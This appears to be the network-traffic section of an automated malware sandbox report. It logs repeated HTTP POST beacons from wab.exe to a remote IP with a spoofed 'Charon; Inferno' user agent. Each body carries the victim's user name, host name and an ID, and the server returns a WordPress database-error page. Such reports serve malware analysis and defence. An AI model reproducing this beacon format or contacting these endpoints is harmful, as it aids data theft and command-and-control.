09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 2e 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 35 70 78 20 30 20 32 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c
                                                                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>Database Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 20px;}#error-page code {font-family: Consolas, Monaco,
                                                                              Apr 18, 2024 21:15:01.671211004 CEST1289INData Raw: 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 6c 20 6c 69 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 20 3b 0a 09 09 7d 0a 09 09 61 20 7b 0a 09
                                                                              Data Ascii: monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid trans
                                                                              Apr 18, 2024 21:15:01.671224117 CEST115INData Raw: 22 65 72 72 6f 72 2d 70 61 67 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 22 3e 3c 68 31 3e 45 72 72 6f 72 20 65 73 74 61 62 6c 69 73 68 69 6e 67 20 61 20 64 61 74 61 62 61 73 65 20 63 6f 6e 6e 65
                                                                              Data Ascii: "error-page"><div class="wp-die-message"><h1>Error establishing a database connection</h1></div></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              8192.168.2.54972624.199.107.111805496C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Apr 18, 2024 21:15:01.992568970 CEST246OUTPOST /index.php/927339792 HTTP/1.0
                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                              Host: 24.199.107.111
                                                                              Accept: */*
                                                                              Content-Type: application/octet-stream
                                                                              Content-Encoding: binary
                                                                              Content-Key: F4173C58
                                                                              Content-Length: 153
                                                                              Connection: close
                                                                              Apr 18, 2024 21:15:02.155183077 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 36 00 32 00 32 00 35 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                              Data Ascii: (ckav.rualfons562258ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                              Apr 18, 2024 21:15:02.984257936 CEST1289INHTTP/1.0 500 Internal Server Error
                                                                              Date: Thu, 18 Apr 2024 19:15:02 GMT
                                                                              Server: Apache/2.4.59 (Debian)
                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                              Content-Length: 2412
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 44 61 74 61 62 61 73 65 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 4f 78 79 67 65 6e 2d 53 61 6e 73 2c 20 55 62 75 6e 74 75 2c 20 43 61 6e 74 61 72 65 6c 6c 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 65 6d 20 61 75 74 6f 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 31 65 6d 20 32 65 6d 3b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 7d 0a 09 09 68 31 20 7b 0a 09 09 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 09 09 09 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 33 30 70 78 20 30 20 30 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 37 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 70 2c 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 2e 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 35 70 78 20 30 20 32 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c
                                                                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>Database Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 20px;}#error-page code {font-family: Consolas, Monaco,
                                                                              Apr 18, 2024 21:15:02.984285116 CEST1289INData Raw: 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 6c 20 6c 69 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 20 3b 0a 09 09 7d 0a 09 09 61 20 7b 0a 09
                                                                              Data Ascii: monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid trans
                                                                              Apr 18, 2024 21:15:02.984301090 CEST115INData Raw: 22 65 72 72 6f 72 2d 70 61 67 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 22 3e 3c 68 31 3e 45 72 72 6f 72 20 65 73 74 61 62 6c 69 73 68 69 6e 67 20 61 20 64 61 74 61 62 61 73 65 20 63 6f 6e 6e 65
                                                                              Data Ascii: "error-page"><div class="wp-die-message"><h1>Error establishing a database connection</h1></div></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              9192.168.2.54972724.199.107.111805496C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Apr 18, 2024 21:15:03.295986891 CEST246OUTPOST /index.php/927339792 HTTP/1.0
                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                              Host: 24.199.107.111
                                                                              Accept: */*
                                                                              Content-Type: application/octet-stream
                                                                              Content-Encoding: binary
                                                                              Content-Key: F4173C58
                                                                              Content-Length: 153
                                                                              Connection: close
                                                                              Apr 18, 2024 21:15:03.459537029 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 36 00 32 00 32 00 35 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                              Data Ascii: (ckav.rualfons562258ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                              Apr 18, 2024 21:15:04.295588970 CEST1289INHTTP/1.0 500 Internal Server Error
                                                                              Date: Thu, 18 Apr 2024 19:15:03 GMT
                                                                              Server: Apache/2.4.59 (Debian)
                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                              Content-Length: 2412
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 44 61 74 61 62 61 73 65 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 4f 78 79 67 65 6e 2d 53 61 6e 73 2c 20 55 62 75 6e 74 75 2c 20 43 61 6e 74 61 72 65 6c 6c 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 65 6d 20 61 75 74 6f 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 31 65 6d 20 32 65 6d 3b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 7d 0a 09 09 68 31 20 7b 0a 09 09 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 09 09 09 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 33 30 70 78 20 30 20 30 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 37 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 70 2c 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 2e 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 35 70 78 20 30 20 32 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c
                                                                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>Database Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 20px;}#error-page code {font-family: Consolas, Monaco,
                                                                              Apr 18, 2024 21:15:04.295640945 CEST1289INData Raw: 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 6c 20 6c 69 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 20 3b 0a 09 09 7d 0a 09 09 61 20 7b 0a 09
                                                                              Data Ascii: monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid trans
                                                                              Apr 18, 2024 21:15:04.295674086 CEST115INData Raw: 22 65 72 72 6f 72 2d 70 61 67 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 22 3e 3c 68 31 3e 45 72 72 6f 72 20 65 73 74 61 62 6c 69 73 68 69 6e 67 20 61 20 64 61 74 61 62 61 73 65 20 63 6f 6e 6e 65
                                                                              Data Ascii: "error-page"><div class="wp-die-message"><h1>Error establishing a database connection</h1></div></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              10192.168.2.54972824.199.107.111805496C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Apr 18, 2024 21:15:04.601914883 CEST246OUTPOST /index.php/927339792 HTTP/1.0
                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                              Host: 24.199.107.111
                                                                              Accept: */*
                                                                              Content-Type: application/octet-stream
                                                                              Content-Encoding: binary
                                                                              Content-Key: F4173C58
                                                                              Content-Length: 153
                                                                              Connection: close
                                                                              Apr 18, 2024 21:15:04.765242100 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 36 00 32 00 32 00 35 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                              Data Ascii: (ckav.rualfons562258ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                              Apr 18, 2024 21:15:05.597490072 CEST1289INHTTP/1.0 500 Internal Server Error
                                                                              Date: Thu, 18 Apr 2024 19:15:04 GMT
                                                                              Server: Apache/2.4.59 (Debian)
                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                              Content-Length: 2412
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 44 61 74 61 62 61 73 65 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 4f 78 79 67 65 6e 2d 53 61 6e 73 2c 20 55 62 75 6e 74 75 2c 20 43 61 6e 74 61 72 65 6c 6c 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 65 6d 20 61 75 74 6f 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 31 65 6d 20 32 65 6d 3b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 7d 0a 09 09 68 31 20 7b 0a 09 09 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 09 09 09 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 33 30 70 78 20 30 20 30 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 37 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 70 2c 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 2e 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 35 70 78 20 30 20 32 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c
                                                                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>Database Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 20px;}#error-page code {font-family: Consolas, Monaco,
                                                                              Apr 18, 2024 21:15:05.597520113 CEST1289INData Raw: 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 6c 20 6c 69 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 20 3b 0a 09 09 7d 0a 09 09 61 20 7b 0a 09
                                                                              Data Ascii: monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid trans
                                                                              Apr 18, 2024 21:15:05.597532988 CEST115INData Raw: 22 65 72 72 6f 72 2d 70 61 67 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 22 3e 3c 68 31 3e 45 72 72 6f 72 20 65 73 74 61 62 6c 69 73 68 69 6e 67 20 61 20 64 61 74 61 62 61 73 65 20 63 6f 6e 6e 65
                                                                              Data Ascii: "error-page"><div class="wp-die-message"><h1>Error establishing a database connection</h1></div></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              11192.168.2.54972924.199.107.111805496C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Apr 18, 2024 21:15:05.927819967 CEST246OUTPOST /index.php/927339792 HTTP/1.0
                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                              Host: 24.199.107.111
                                                                              Accept: */*
                                                                              Content-Type: application/octet-stream
                                                                              Content-Encoding: binary
                                                                              Content-Key: F4173C58
                                                                              Content-Length: 153
                                                                              Connection: close
                                                                              Apr 18, 2024 21:15:06.092103004 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 36 00 32 00 32 00 35 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                              Data Ascii: (ckav.rualfons562258ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                              Apr 18, 2024 21:15:06.903381109 CEST1289INHTTP/1.0 500 Internal Server Error
                                                                              Date: Thu, 18 Apr 2024 19:15:06 GMT
                                                                              Server: Apache/2.4.59 (Debian)
                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                              Content-Length: 2412
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=UTF-8
